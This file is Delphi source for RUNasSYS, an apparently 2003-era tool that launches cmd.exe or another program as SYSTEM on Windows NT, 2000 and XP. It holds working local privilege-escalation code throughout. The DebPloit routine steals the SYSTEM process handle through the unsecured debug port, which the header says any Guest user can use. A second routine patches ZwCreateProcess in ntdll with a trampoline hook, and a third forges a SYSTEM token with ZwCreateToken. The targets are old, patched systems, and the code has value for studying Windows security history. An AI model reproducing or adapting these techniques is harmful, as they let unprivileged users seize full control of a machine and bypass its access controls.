(******************************************************************************
 ******************************************************************************
 ***                                                                        ***
 ***   RUNasSYS (invokes the NT command processor under SYSTEM account)     ***
 ***   Version [1.2.1]                              {Last mod 2003-10-19}   ***
 ***                                                                        ***
 ******************************************************************************
 ******************************************************************************

                                 _\\|//_
                                (` * * ')
 ______________________________ooO_(_)_Ooo_____________________________________
 ******************************************************************************
 ******************************************************************************
 ***                                                                        ***
 ***                Copyright (c) 1995 - 2003 by -=Assarbad=-               ***
 ***              Portions Copyright (c) 2002 by Eugen Honeker              ***
 ***                                                                        ***
 ***   CONTACT TO THE AUTHOR(S):                                            ***
 ***    ____________________________________                                ***
 ***   |                                    |                               ***
 ***   | -=Assarbad=- aka Oliver            |                               ***
 ***   |____________________________________|                               ***
 ***   |                                    |                               ***
 ***   | Assarbad@gmx.info|.net|.com|.de    |                               ***
 ***   | ICQ: 281645                        |                               ***
 ***   | AIM: nixlosheute                   |                               ***
 ***   |      nixahnungnicht                |                               ***
 ***   | MSN: Assarbad@ePost.de             |                               ***
 ***   | YIM: sherlock_holmes_and_dr_watson |                               ***
 ***   |____________________________________|                               ***
 ***             ___                                                        ***
 ***            /   |                     ||              ||                ***
 ***           / _  |   ________ ___  ____||__    ___   __||                ***
 ***          / /_\ |  / __/ __//   |/  _/|   \  /   | /   |                ***
 ***         / ___  |__\\__\\  / /\ || |  | /\ \/ /\ |/ /\ | DOT NET        ***
 ***        /_/   \_/___/___/ /_____\|_|  |____/_____\\__/\|                ***
 ***       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~        ***
 ***              [http://assarbad.net | http://assarbad.org]               ***
 ***                                                                        ***
 ***   Notes:                                                               ***
 ***   - my first name is Oliver, you may well use this in your e-mails     ***
 ***   - for questions and/or proposals drop me a mail or instant message   ***
 ***                                                                        ***
 ***~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~***
 ***              May the source be with you, stranger ... ;)               ***
 ***    Snizhok, eto ne tolko fruktovij kefir, snizhok, eto stil zhizn.     ***
 ***                     Vsem Privet iz Germanij                            ***
 ***                                                                        ***
 *** Greets from -=Assarbad=- fly to YOU =)                                 ***
 *** Special greets fly 2 Nico, Casper, SA, Pizza, Navarion, Eugen, Zhenja, ***
 *** Xandros, Melkij, Strelok etc pp.                                       ***
 ***                                                                        ***
 *** Thanks to:                                                             ***
 *** W.A. Mozart, Vivaldi, Beethoven, Poeta Magica, Kurtzweyl, Manowar,     ***
 *** Blind Guardian, Weltenbrand, In Extremo, Wolfsheim, Carl Orff, Zemfira ***
 *** ... most of my work was done with their music in the background ;)     ***
 ***                                                                        ***
 ******************************************************************************
 ******************************************************************************

 LEGAL STUFF:
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 Copyright (c) 1995-2003, -=Assarbad=- ["copyright holder(s)"]
 All rights reserved.

 Redistribution and use in source and binary forms, with or without
 modification, are permitted provided that the following conditions are met:

 1. Redistributions of source code must retain the above copyright notice, this
    list of conditions and the following disclaimer.
 2. Redistributions in binary form must reproduce the above copyright notice,
    this list of conditions and the following disclaimer in the documentation
    and/or other materials provided with the distribution.
 3. The name(s) of the copyright holder(s) may not be used to endorse or
    promote products derived from this software without specific prior written
    permission.

 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
 DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE FOR ANY
 DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
 (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
 LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
 ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
 SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                             .oooO     Oooo.
 ____________________________(   )_____(   )___________________________________
                              \ (       ) /
                               \_)     (_/

 Version 1.2.0.0
 2003-10-02

 CMDasSYS2 aka RUNasSYS:
   Invokes the NT command processor or another program.
   This is done by trying three methods:
   - Debploit (if this is possible your system is obviously vulnerable). Any
     Guest user can use this to gain highest privileges.
   - Debug privilege. Here any user with this privilege can patch the underlying
     Nt/ZwCreateProcess API to replace the handle of the parent process by the
     handle of the system process - effectively inheriting its privilege level.
   - SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege. These privileges are
     not set for any user by default. Anyway, it shows what one can achieve by
     forging ones own impersonation token.

 Revision history:
 1.2.0.0
   - Now this program employs three possible methods to invoke a program under
     SYSTEM context.

 1.1.2.0
   - Structural and other minor enhancements.

 1.1.1.0
   - First public release.

 ******************************************************************************)

program RUNasSYS;
{$APPTYPE CONSOLE}
uses
  Windows;

{$R .\Resources\ico.res}
{$R .\Resources\main.res}
{$INCLUDE .\Includes\Compilerswitches.pas}
{$INCLUDE .\Includes\FormatString.pas}
type
  NTSTATUS = Longint;

  CLIENT_ID = packed record
    UniqueProcess: THandle;
    UniqueThread: THandle;
  end;
  PCLIENT_ID = ^CLIENT_ID;

  PORT_MESSAGE = packed record
    DataSize,
      MessageSize,
      MessageType,
      VirtualRangesOffset: Word;
    CallerId: CLIENT_ID;
    MessageId: ULONG;
    SectionSize: ULONG;
    DebugEventCode: ULONG;
    Status: ULONG;
    DebuggeeId: CLIENT_ID;
    DbgSsKmMsg: Pointer;
    DebuggerId: CLIENT_ID;
    Unknown: array[0..18] of DWORD;
  end;
  PPORT_MESSAGE = ^PORT_MESSAGE;

  UNICODE_STRING = record
    Length,
      MaxLength: Word;
    Buffer: PWideChar;
  end;
  PUNICODE_STRING = ^UNICODE_STRING;

  SECURITY_QUALITY_OF_SERVICE = packed record
    Length: ULONG;
    ImpersonationLevel: TSecurityImpersonationLevel;
    ContextTrackingMode: Boolean;
    EffectiveOnly: Boolean;
  end;
  PSECURITY_QUALITY_OF_SERVICE = ^SECURITY_QUALITY_OF_SERVICE;

  TOKEN_SOURCE = packed record
    SourceName: array[0..7] of char;
    SourceIdentifier: TLargeInteger;
  end;
  PTOKEN_SOURCE = ^TOKEN_SOURCE;
  TTokenSource = TOKEN_SOURCE;
  PTokenSource = ^TOKEN_SOURCE;

  TOKEN_STATISTICS = packed record
    TokenId,
      AuthenticationId: TLargeInteger;
    ExpirationTime: TLargeInteger;
    TokenType: TTokenType;
    ImpersonationLevel: TSecurityImpersonationLevel;
    DynamicCharged,
      DynamicAvailable,
      GroupCount,
      PrivilegeCount: DWORD;
    ModifiedId: TLargeInteger;
  end;
  PTOKEN_STATISTICS = ^TOKEN_STATISTICS;
  TTokenStatistics = TOKEN_STATISTICS;
  PTokenStatistics = ^TOKEN_STATISTICS;

  TOKEN_USER = packed record
    User: TSIDAndAttributes;
  end;
  PTOKEN_USER = ^TOKEN_USER;
  TTokenUser = TOKEN_USER;
  PTokenUser = ^TOKEN_USER;

  OBJECT_ATTRIBUTES = packed record
    Length: ULONG;
    RootDirectory: Cardinal;
    ObjectName: PUNICODE_STRING;
    Attributes: ULONG;
    SecurityDescriptor: Pointer; // Points to type SECURITY_DESCRIPTOR
    SecurityQualityOfService: Pointer;
      // Points to type SECURITY_QUALITY_OF_SERVICE
  end;
  POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;

// -----------------------------------------------------------------------------
// Imported functions
// -----------------------------------------------------------------------------

function RtlInitUnicodeString(
  var DestinationString: UNICODE_STRING;
  const SourceString: PWideChar
  ): NTSTATUS; stdcall; external 'ntdll.dll';

function ZwConnectPort(
  out PortHandle: THandle;
  const PortName: UNICODE_STRING;
  SecurityQos: PSECURITY_QUALITY_OF_SERVICE;
  WriteSection: Pointer; // PPORT_SECTION_WRITE
  ReadSection: Pointer; // PPORT_SECTION_READ
  var MaxMessageSize: DWORD;
  ConnectData: Pointer;
  var ConnectDataLength: DWORD
  ): NTSTATUS; stdcall; external 'ntdll.dll';

function DbgUiConnectToDbg
  : NTSTATUS; stdcall; external 'ntdll.dll';

function ZwRequestPort(
  PortHandle: THandle;
  RequestMessage: PPORT_MESSAGE
  ): NTSTATUS; stdcall; external 'ntdll.dll';

function ZwClose(
  hObject: THandle
  ): NTSTATUS; stdcall; external 'ntdll.dll';

function ZwCreateToken(
  out TokenHandle: {$IFDEF DELPHI4UP}Cardinal{$ELSE}Integer{$ENDIF};
  DesiredAccess: ACCESS_MASK;
  ObjectAttributes: POBJECT_ATTRIBUTES;
  Type_: TTokenType;
  AuthenticationId: PLargeInteger;
  ExpirationTime: PLargeInteger;
  User: PTOKEN_USER;
  Groups: PTokenGroups;
  Privileges: PTOKENPRIVILEGES;
  Owner: Pointer;
  PrimaryGroup: Pointer;
  DefaultDacl: Pointer;
  Source: PTOKEN_SOURCE
  ): NTSTATUS; stdcall; external 'ntdll.dll';
// -----------------------------------------------------------------------------
// \Imported functions
// -----------------------------------------------------------------------------

type
  PTrampoline = ^TTrampoline;
  TTrampoline = packed record
    MOV_OP: Byte;
    Address: Pointer;
    JMP_OP,
      JMP_Spec: Byte;
  end;
  TCreateMethod = (
    cmUseDebugPriv,
    cmUseDebPloit,
    cmForgeToken
    );

const
  SS_CREATE_PROCESS_REQUEST = 2;
  NTAUTH: TSIDIdentifierAuthority = (Value: (0, 0, 0, 0, 0, 5));
  SECURITY_LOCAL_SYSTEM_RID: Cardinal = $00000012;
  DefaultCommand = 'cmd.exe /X /K mode con cols=80 lines=50 & color 0A & cls';

// Needed for global variable initialisation

function HookZwCreateProcess: Integer; stdcall; forward;

var
  authid: {$IFDEF DELPHI4UP}LARGE_INTEGER{$ELSE}TLargeInteger{$ENDIF} =
  (lowPart:
    $3E7; highpart: 0);
  hParentProcess: THANDLE;
  OldTrampoline: TTrampoline;
  NewTrampoline: TTrampoline = (
    MOV_OP: $B8; // => MOV EAX, ????????
    Address: @HookZwCreateProcess; // => MOV EAX, Address
    JMP_OP: $FF; // JMP (near)
    JMP_Spec: $E0; // EAX
    );

{
  The old trampoline is used to have dynamic patching (i.e.) it saves all old
  values including the index into the SST (System Service Table).

  The new trampoline is actually initialised with the necessary values at
  startup. It contains the following code (literally):
  -------
  MOV   EAX, [HookZwCreateProcess]
  JMP   EAX
  -------
}

function MyGetUserName: string;
var
  nsize: {$IFDEF DELPHI4UP}Cardinal{$ELSE}Integer{$ENDIF};
begin
  nSize := MAX_PATH;
  SetLength(Result, nSize);
  ZeroMemory(@Result[1], nSize);
  GetUsername(@Result[1], nSize);
  SetLength(Result, lstrlen(@Result[1]));
end;

function MyGetComputerName: string;
var
  nsize: {$IFDEF DELPHI4UP}Cardinal{$ELSE}Integer{$ENDIF};
begin
  nSize := MAX_PATH;
  SetLength(Result, nSize);
  ZeroMemory(@Result[1], nSize);
  GetComputerName(@Result[1], nSize);
  SetLength(Result, lstrlen(@Result[1]));
end;

function MyDesktopName: string;
var
  hDesk,
    hWinsta: THandle;
  needed: DWORD;
  WinStaN: string;
begin
// Connect to the desktop (needed on Windows NT 3.51)
  GetDesktopWindow;
// Get user's desktop as handle
  hDesk := GetThreadDesktop(GetCurrentThreadID);
// Get user's window station as handle
  hWinsta := GetProcessWindowStation;
  needed := MAX_PATH;
  SetLength(result, needed);
  SetLength(WinStaN, needed);
// Try getting the name of the desktop
  GetUserObjectInformation(hDesk, UOI_NAME, @result[1], length(result), needed);
  GetUserObjectInformation(hWinsta, UOI_NAME, @WinStaN[1], length(WinStaN), needed);
// Set desktop name as string
  SetLength(result, lstrlen(@result[1]));
  SetLength(WinStaN, lstrlen(@WinStaN[1]));
// Merge the name like "WinSta0\Default"
  result := Format('%s\%s', [WinStaN, result]);
end;

function HookZwCreateProcess: Integer; stdcall;
asm
// Replace the original handle with ours ;)
  MOV     EAX, hParentProcess
  MOV     DWORD PTR [ESP+16], EAX
// Choose the index into SST
  MOV     EAX, OldTrampoline.Address
// Load parameters table
  LEA     EDX, DWORD PTR [ESP+4]
// Call SST dispatcher
  INT     2Eh
// Return (consider stack frame!)
  RETN    20h
end;

function HookZwCreateProcess_XP: Integer; stdcall;
asm
// Replace the original handle with ours ;)
  MOV     EAX, hParentProcess
  MOV     DWORD PTR [ESP+16], EAX
// Choose the index into SST
  MOV     EAX, OldTrampoline.Address
// This one is XP specific - SYSENTER
  MOV     EDX, ESP
  DB      0Fh, 34h // SYSENTER
// Return (consider stack frame!)
  RETN    20h
end;

function DebPloitStealProcessHandle(dwPid: DWORD): THandle;
(*
  DebPloit has been discovered by EliCZ. It is all about the fact, that the
  debug port is not secured by an appropriate ACL. This is also the usual
  workaround. It has been fixed at the end of 2002 I believe.
*)
// NEVER use TRY/EXCEPT or TRY/FINALLY in this routine. This will interfere with
// the method used.
var
  Qos: SECURITY_QUALITY_OF_SERVICE;
  usPortname: UNICODE_STRING;
  PortMessage: PORT_MESSAGE;
  DebugEvent: TDebugEvent;
  hDebugPort: THandle;
begin
  Result := 0;
  hDebugPort := 0;
// Fill the quality of service structure
  ZeroMemory(@QoS, sizeof(QoS));
  with QoS do
  begin
    Length := sizeof(SECURITY_QUALITY_OF_SERVICE);
    ImpersonationLevel := SecurityImpersonation;
    ContextTrackingMode := SECURITY_DYNAMIC_TRACKING;
    EffectiveOnly := True;
  end;
// Set the port name of the port we want to connect to
  RtlInitUnicodeString(usPortname, '\DbgSsApiPort');
// Connect to the debug port
  if ZwConnectPort(hDebugPort, usPortname, @Qos, nil, nil, PDWORD(nil)^, nil, PDWORD(nil)^) >= 0 then
  begin
// "Register as debugger"
    if DbgUiConnectToDbg >= 0 then
    begin
// Fill LPC message structure
      ZeroMemory(@PortMessage, sizeof(PortMessage));
      with PortMessage do
      begin
        DataSize := $38; // This is specific to this message
        MessageSize := sizeof(PORT_MESSAGE);
        DebugEventCode := SS_CREATE_PROCESS_REQUEST;
        DebuggeeId.UniqueProcess := dwPid;
        DebuggerId.UniqueProcess := GetCurrentProcessId;
        DebuggerId.UniqueThread := GetCurrentThreadId;
      end;
// Send the LPC request
      if ZwRequestPort(hDebugPort, @PortMessage) >= 0 then
// Wait for the requested event to occur (that is, registering as the debugger for the system process)
        if WaitForDebugEvent(DebugEvent, 1000) then
// Check wether it is the wanted event
          if ((DebugEvent.dwDebugEventCode = CREATE_PROCESS_DEBUG_EVENT) and (DebugEvent.CreateProcessInfo.hProcess <> 0)) then
          begin
// Duplicate the handle to get full access to it
            DuplicateHandle(
              DebugEvent.CreateProcessInfo.hProcess,
              GetCurrentProcess,
              GetCurrentProcess,
              @Result,
              0,
              False,
              DUPLICATE_SAME_ACCESS
              );
// Close the "original" handle, return duplicated one
            CloseHandle(DebugEvent.CreateProcessInfo.hProcess);
          end;
    end;
// Close the port
    ZwClose(hDebugPort);
  end;
end;

function EnablePrivilege(name: string): Boolean;
var
  hToken: THandle;
  tp: TTokenPrivileges;
begin
  Result := False;
// Open current process
  if OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken) then
  try
// Lookup LUID for the specified priv name
    if LookupPrivilegeValue(nil, @name[1], tp.Privileges[0].Luid) then
    try
      tp.PrivilegeCount := 1;
// Set priv to enabled
      tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED or SE_PRIVILEGE_ENABLED_BY_DEFAULT or SE_PRIVILEGE_USED_FOR_ACCESS;
// Adjust privileges
      AdjustTokenPrivileges(hToken, FALSE, tp, sizeof(TOKEN_PRIVILEGES), PTokenPrivileges(nil)^, PDWORD(nil)^);
    finally
      Result := GetLastError = ERROR_SUCCESS;
    end;
  finally
// Close the token
    CloseHandle(hToken);
  end;
end;

function GetFromToken(hToken: Cardinal; tic: TTokenInformationClass): Pointer;
var
  n: {$IFDEF DELPHI4UP}Cardinal{$ELSE}Integer{$ENDIF};
  p: Pointer;
begin
  result := nil;
  if ((not GetTokenInformation(hToken, tic, nil, 0, n)) and (GetLastError <>
    ERROR_INSUFFICIENT_BUFFER)) then exit;
  Getmem(p, n);
  if GetTokenInformation(hToken, tic, p, n, n) then
    result := p;
end;

function ForgeSystemToken: THandle;
var
  hToken,
    hToken2: {$IFDEF DELPHI4UP}Cardinal{$ELSE}Integer{$ENDIF};
  system: PSID;
  llLuid: TLargeInteger;
  source: TTokenSource;
  stats: PTokenStatistics;
  user: TTokenUser;
  sqos: TSecurityQualityOfService;
  oa: OBJECT_ATTRIBUTES;
begin
  EnablePrivilege('SeCreateTokenPrivilege');
  EnablePrivilege('SeAssignPrimaryTokenPrivilege');
  OpenProcessToken(GetCurrentProcess, TOKEN_QUERY or TOKEN_QUERY_SOURCE, hToken);
  AllocateAndInitializeSid(NTAUTH, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, system);
  AllocateLocallyUniqueId(llLuid);
  with source, user do
  begin
    User.Sid := system;
    User.Attributes := 0;
    SourceName := '**ANON**';
    SourceIdentifier := llLuid;
  end;
  stats := GetFromToken(hToken, TokenStatistics);
  with sqos do
  begin
    Length := sizeof(sqos);
    ImpersonationLevel := SecurityAnonymous;
    ContextTrackingMode := SECURITY_STATIC_TRACKING;
    EffectiveOnly := False;
  end;
  with oa do
  begin
    Length := sizeof(oa);
    RootDirectory := 0;
    ObjectName := nil;
    Attributes := 0;
    SecurityDescriptor := nil;
    SecurityQualityOfService := @sqos;
  end;
  hToken2 := 0;
  ZwCreateToken(
    hToken2,
    TOKEN_ALL_ACCESS,
    @oa,
    TokenPrimary,
    @authid,
    @stats.ExpirationTime,
    @user,
    Pointer(GetFromToken(hToken, TokenGroups)),
    Pointer(GetFromToken(hToken, TokenPrivileges)),
    Pointer(GetFromToken(hToken, TokenOwner)),
    Pointer(GetFromToken(hToken, TokenPrimaryGroup)),
    Pointer(GetFromToken(hToken, TokenDefaultDacl)),
    @source);
  CloseHandle(hToken);
  result := hToken2;
end;

function MyCreateProcessA(CommandLine: PChar): BOOL;
//Since invoked from SYSTEM context it creates a process under this context
var
  si: TStartupInfo;
  pi: TProcessInformation;
  Contitle: string;
begin
  result := False;
// Fill startupinfo structure with #0
  ZeroMemory(@si, SizeOf(si));
// Set structure version (i.e. size)
  with si do
  begin
    cb := sizeof(TStartupInfo);
// Set different parameters
    dwFlags := STARTF_USECOUNTCHARS or STARTF_USEFILLATTRIBUTE or STARTF_USEPOSITION;
// Console text attributes
    dwFillAttribute := FOREGROUND_GREEN or FOREGROUND_INTENSITY;
// Console size
    dwXCountChars := 80;
    dwYCountChars := 50;
// Format console title to include user's name
    Contitle := Format('CMD.EXE running as %s@%s\%s', ['SYSTEM', MyGetComputerName, MyDesktopName]);
// Prepare console title
    si.lpTitle := @Contitle[1];
  end;
// Return the result of creating the process
  if CreateProcess(
    nil,
    CommandLine,
    nil,
    nil,
    True,
    0,
    nil,
    nil,
    si,
    pi) then
// If successful just clean up the handles
  begin
// "Detach" from everything
    SetConsoleTitle(@ConTitle[1]);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    result := True;
  end;
end;

function MyCreateProcessAsSYSTEM_A(CommandLine: PChar): BOOL;
//Since invoked from SYSTEM context it creates a process under this context
var
  si: TStartupInfo;
  pi: TProcessInformation;
  Contitle: string;
  hToken: THandle;
begin
  result := False;
// Fill startupinfo structure with #0
  ZeroMemory(@si, SizeOf(si));
// Set structure version (i.e. size)
  with si do
  begin
    cb := sizeof(TStartupInfo);
// Set different parameters
    dwFlags := STARTF_USECOUNTCHARS or STARTF_USEFILLATTRIBUTE or STARTF_USEPOSITION;
// Console text attributes
    dwFillAttribute := FOREGROUND_GREEN or FOREGROUND_INTENSITY;
// Console size
    dwXCountChars := 80;
    dwYCountChars := 50;
// Format console title to include user's name
    Contitle := Format('CMD.EXE running as %s@%s\%s', ['SYSTEM', MyGetComputerName, MyDesktopName]);
// Prepare console title
    si.lpTitle := @Contitle[1];
  end;
// Return the result of creating the process
  hToken := ForgeSystemToken;
  ImpersonateLoggedOnUser(hToken);
  if CreateProcessAsUser(
    hToken,
    nil,
    CommandLine,
    nil,
    nil,
    True,
    0,
    nil,
    nil,
    si,
    pi) then
// If successful just clean up the handles
  begin
// "Detach" from everything
    SetConsoleTitle(@ConTitle[1]);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    RevertToSelf;
    result := True;
  end;
end;

function CreateSystemProcess(Method: TCreateMethod): Boolean;
var
  ZwCreateProcessEntry: Pointer;
  mbi: TMemoryBasicInformation;
  dwOldProtect,
    dwSystemPID: DWORD;
  osvi: TOSVersionInfo;
  Command:String;
begin
  Result := False;
  osvi.dwOSVersionInfoSize := sizeof(osvi);
  if GetVersionEx(osvi) then
  begin
// -----------------------------------------------------------------------------
// XP is the latest supported version!
    if ((osvi.dwMajorVersion > 5) or ((osvi.dwMajorVersion = 5) and (osvi.dwMinorVersion > 1))) then
      Halt;
// -----------------------------------------------------------------------------
    if ParamStr(1)<>'' then
      Command:=ParamStr(1)
    else
      Command:=DefaultCommand;
    case osvi.dwMajorVersion of
      3, 4: dwSystemPID := 2;
    else
      dwSystemPID := 8;
    end;
// FIRST get process handle for first two methods
    case Method of
      cmUseDebugPriv:
// Check for XP -> I had problems on XP
        if (osvi.dwMajorVersion <= 5) and (osvi.dwMinorVersion <= 1) then
        begin
// Try to get debug privilege
          if EnablePrivilege('SeDebugPrivilege') then
// Try to open the system process
            hParentProcess := OpenProcess(PROCESS_CREATE_PROCESS, True, dwSystemPID)
          else
            Exit;
        end;
      cmUseDebPloit:
// Check for XP
        if (osvi.dwMajorVersion <= 5) and (osvi.dwMinorVersion <= 1) then
// Try to steal system process handle
          hParentProcess := DebPloitStealProcessHandle(dwSystemPID)
        else
// XP does not have this security hole!
          hParentProcess := 0;
    end;
// SEDCOND invoke the process
    case Method of
      cmUseDebugPriv,
        cmUseDebPloit:
        if (hParentProcess <> 0) then
        try
// Determine entry point for the Zw/NtCreateProcess function (same in user mode)
          ZwCreateProcessEntry := (GetProcAddress(GetModuleHandle('NTDLL.DLL'), 'ZwCreateProcess'));
          if (ZwCreateProcessEntry <> nil) then
// Determine several memory parameters
            if (VirtualQuery(ZwCreateProcessEntry, mbi, sizeof(MEMORY_BASIC_INFORMATION)) > 0) then
// Set new protection scheme to allow patching
              if VirtualProtect(mbi.AllocationBase, mbi.RegionSize, PAGE_EXECUTE_READWRITE, {$IFNDEF DELPHI5UP}@{$ENDIF}dwOldProtect) then
              try
// Copy old values
                CopyMemory(@OldTrampoline, ZwCreateProcessEntry, sizeof(TTrampoline));
// Write our trampoline
                if (osvi.dwMajorVersion = 5) and (osvi.dwMinorVersion = 1) then
// NOTE: This is very specific to XP!
                  NewTrampoline.Address := @HookZwCreateProcess_XP;
                CopyMemory(ZwCreateProcessEntry, @NewTrampoline, sizeof(TTrampoline));
// Create a process from this context
                Result := MyCreateProcessA(@Command[1]);
              finally
// Restore old values
                CopyMemory(ZwCreateProcessEntry, @OldTrampoline, sizeof(TTrampoline));
// Reset to old protection scheme
                VirtualProtect(mbi.AllocationBase, mbi.RegionSize, dwOldProtect, {$IFNDEF DELPHI5UP}@{$ENDIF}dwOldProtect);
              end;
        finally
          CloseHandle(hParentProcess);
        end;
      cmForgeToken:
// Try to forge a token and create a process
        Result := MyCreateProcessAsSYSTEM_A(@Command[1]);
    end;
  end;
end;

begin
  if not CreateSystemProcess(cmUseDebPloit) then
    if not CreateSystemProcess(cmUseDebugPriv) then
      CreateSystemProcess(cmForgeToken);
end.

